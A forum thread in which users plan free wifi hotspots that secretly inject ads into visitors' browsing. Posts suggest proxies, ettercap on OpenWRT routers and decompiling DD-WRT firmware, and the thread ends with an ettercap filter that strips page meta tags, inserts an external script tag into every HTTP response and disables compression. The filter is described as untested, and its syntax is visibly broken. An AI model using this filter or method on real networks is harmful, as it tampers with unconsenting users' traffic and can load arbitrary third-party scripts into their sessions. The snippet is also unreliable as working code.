Inject Ads into hotpsots

shift

I was thinking of making a few free wifi spots with ads injected into them. So far the only way i can think of how to do is is forcing it through a proxy and restrict them to just the proxy.. but there has to be a cleaner way of just injecting some code into pages... any one have any ideas?

I do not know about shift, but I live in a heavily populate area and getting people to hop on mine wouldn't be very hard. Most of them spend their extra time on facebook so I have been looking over the html of that to see if i cant find some nifty was of injecting ads there.

Let me know if you come up with anything, i would just use some random buddies internet then set up some as AP's and some as repeaters to drop around. ettercap would work but you would need a computer to be there to do the dirty work. if you could find a way to build it into the firmware it would be good to go!

There is a service called "my ad network" in the new ddwrt firmware that does it through a third party company.. but i would rather do it my self and not give away half the profits!

. so i might try and decomplile it and see what if there's anything useful in there :)

• 2 weeks later...
  • 2 weeks later...
  • 2 weeks later...
Er, guys, wouldn't the google ads NOT see the full content of the page sicne it's in an I-frame...meaning it wont' target ads...meaning it won't display ads at all?

My initial suggestion of iframes was pretty generic, but you could create a customized filter for each popular site such as myspace, facebook, etc.

• 3 weeks later...

I have noticed that the limitation of the APs, even with open source firmware is that they dont have enough resources to run perl or Mysql. The trick is to run a slim version of a captive portal. Example : NoCatAuth type apps. If you can get an AP that you can add storage to , like the netgear usb versions that you can flash maybe. The other option is to use Alix boards connected to a regualr AP will work wonderfully :) Hope this helps :)

DM

• 1 month later...

Hey all,

Any progress on this?

I work for a company that makes custom OpenWRT based firmware and I've noticed OpenWRT has an ettercap package in their opkg repo. And we've thought of doing this but never have tried and I'd love to be able to show the results of this discussion to my boss cause he's been jonesin' for this stuff for a while but hasn't wanted us to spend time on it. Also I have routers i can use to test on so if someone want's testing done I'll gladly help out.

Idea: use remote mysql db, and local ettercap. you'd be suprised the stuff you can squeeze out of a linksys wrt54gl.

You could use a filter like this to add extra javascript into their web pages. The only down side to this is that you will risk the end of the their html file being cut off (Though the regular expressions dropping the generator and keywords from the html streams should avoid that for most pages.)

Note: I haven't actually tested this but it is based on one of my known working filters and aslong as ettercap has been compiled with libpcre support it should work (though you may need to fix a few bugs)

if (ip.proto == TCP && tcp.src == 80){
        pcre_regex(DATA.data,"<meta name=\"generator\" content=.*?>", "");
        pcre_regex(DATA.data,"<meta name=\"keywords\" content=.*?>", "");
        replace("</head>", "<script src="tiny Url to your javascript file"></script></head>"));
        }
      }
      if (ip.proto == TCP && tcp.dst == 80) {
         if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
         }
      }